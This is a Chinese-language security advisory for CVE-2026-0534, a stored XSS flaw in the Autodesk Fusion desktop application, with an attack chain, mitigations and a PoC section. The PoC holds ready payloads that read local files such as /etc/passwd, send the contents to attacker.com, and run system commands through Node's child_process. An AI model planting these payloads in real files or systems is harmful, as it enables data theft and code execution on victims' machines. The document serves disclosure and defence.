CVE-2026-0534: Autodesk Fusion 存储型XSS漏洞可导致本地文件读取和代码执行

漏洞信息

漏洞编号

CVE-2026-0534

漏洞类型

存储型XSS

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Autodesk Fusion Desktop Application

漏洞概述

CVE-2026-0534是Autodesk Fusion桌面应用程序中的一个高危安全漏洞，CVSS评分达到7.1分。该漏洞属于存储型跨站脚本攻击（Stored Cross-Site Scripting，XSS）类型，攻击者可以通过在CAD零件的属性字段中植入恶意构造的HTML/JavaScript payload，当其他用户查看或点击该文件时，恶意代码会在受害者浏览器上下文中执行。由于Autodesk Fusion桌面应用具有较高的系统权限，攻击者可以利用此漏洞突破浏览器沙箱限制，读取受害者本地文件系统中的敏感文件，甚至在当前进程上下文中执行任意代码，实现完整的系统入侵。此漏洞的利用需要用户交互（点击操作），但无需进行身份认证，攻击门槛相对较低，对企业和个人用户均构成严重安全威胁。Autodesk官方已将此漏洞评级为HIGH严重程度，并建议用户尽快更新到最新版本以修复此安全问题。

技术细节

该漏洞的根本原因在于Autodesk Fusion桌面应用对用户输入的HTML内容缺乏充分的输入验证和输出编码。攻击者可以创建一个包含恶意JavaScript代码的CAD零件文件，当该零件的某个属性字段（如描述、名称等）被设置为恶意payload时，数据会被存储在文件中。随后，当其他用户打开该文件并与特定属性进行交互（点击）时，应用程序会直接将存储的内容渲染到HTML上下文中，而未进行适当的转义处理。这导致嵌入的JavaScript代码得以在受害者的浏览器会话中执行。由于Fusion桌面应用运行在较高权限级别，恶意脚本可以利用Node.js环境或Electron框架的能力，通过child_process模块执行系统命令，实现从沙箱逃逸到本地代码执行。常见的利用手法包括使用XMLHttpRequest或fetch API读取本地文件内容（如/etc/passwd、C:\Users\*等敏感路径），或通过process模块的spawn/exec函数执行任意系统命令。防御此类漏洞需要在前端渲染时对所有用户可控数据进行严格的内容安全策略（CSP）和输入输出编码。

攻击链分析

STEP 1

1

攻击者创建恶意CAD文件：攻击者利用Autodesk Fusion或相关工具创建一个包含恶意HTML/JavaScript payload的零件文件，该payload被嵌入到零件的某个属性字段中

STEP 2

2

分发恶意文件：攻击者通过邮件、共享文件夹、软件分发渠道或其他方式将恶意零件文件传播给目标用户

STEP 3

3

用户打开文件：目标用户使用Autodesk Fusion桌面应用程序打开该恶意零件文件

STEP 4

4

触发漏洞：用户点击或与包含恶意payload的属性字段进行交互，触发存储型XSS代码执行

STEP 5

5

本地文件读取：恶意JavaScript利用应用程序环境读取受害者本地系统敏感文件（如配置文件、密钥、密码等）

STEP 6

6

代码执行：恶意代码通过Node.js的child_process模块或Electron的process API执行系统命令，实现任意代码执行

STEP 7

7

权限提升与持久化：攻击者获取系统级访问权限后可部署后门、窃取数据或进一步渗透网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-0534 PoC: Stored XSS in Autodesk Fusion -->
<!-- This payload demonstrates the XSS vulnerability when embedded in a part's attribute -->

<!-- Basic XSS Payload -->
<script>alert(document.domain)</script>

<!-- File Read Payload (reads local file) -->
<script>
fetch('file:///etc/passwd')
  .then(response => response.text())
  .then(data => {
    // Exfiltrate data to attacker controlled server
    document.location='https://attacker.com/log?data='+btoa(data);
  })
</script>

<!-- Code Execution Payload (using Node.js in Electron context) -->
<script>
const { execSync } = require('child_process');
// Execute arbitrary system command
const result = execSync('whoami > /tmp/pwned.txt');
// Or for Windows:
// execSync('cmd /c whoami > C:\\Users\\Public\\pwned.txt');
</script>

<!-- Combined Payload with exfiltration -->
<img src=x onerror="
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'file:///C:\\Users\\'+process.env.USERNAME+'\\Documents\\*', true);
  xhr.onload = function() {
    fetch('https://attacker.com/exfil?d='+encodeURIComponent(xhr.responseText));
  };
  xhr.send();
">

<!-- Usage: Embed this payload in a Fusion part file's custom property field -->
<!-- When another user opens the file and clicks the property, the script executes -->

影响范围

Autodesk Fusion Desktop Application (版本未明确列出，建议查看官方安全公告)

Fusion 360 Client Downloader (Windows/macOS安装程序)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：限制从未知来源打开CAD零件文件；对来源不明的Fusion文件使用隔离环境（如虚拟机）打开；启用应用程序的沙箱模式（如果支持）；在企业环境中部署终端安全解决方案监控异常文件访问行为；提醒用户不要点击来源不明的零件属性内容；考虑暂时禁用自动脚本执行功能。同时密切关注Autodesk官方安全公告，及时应用官方发布的安全更新。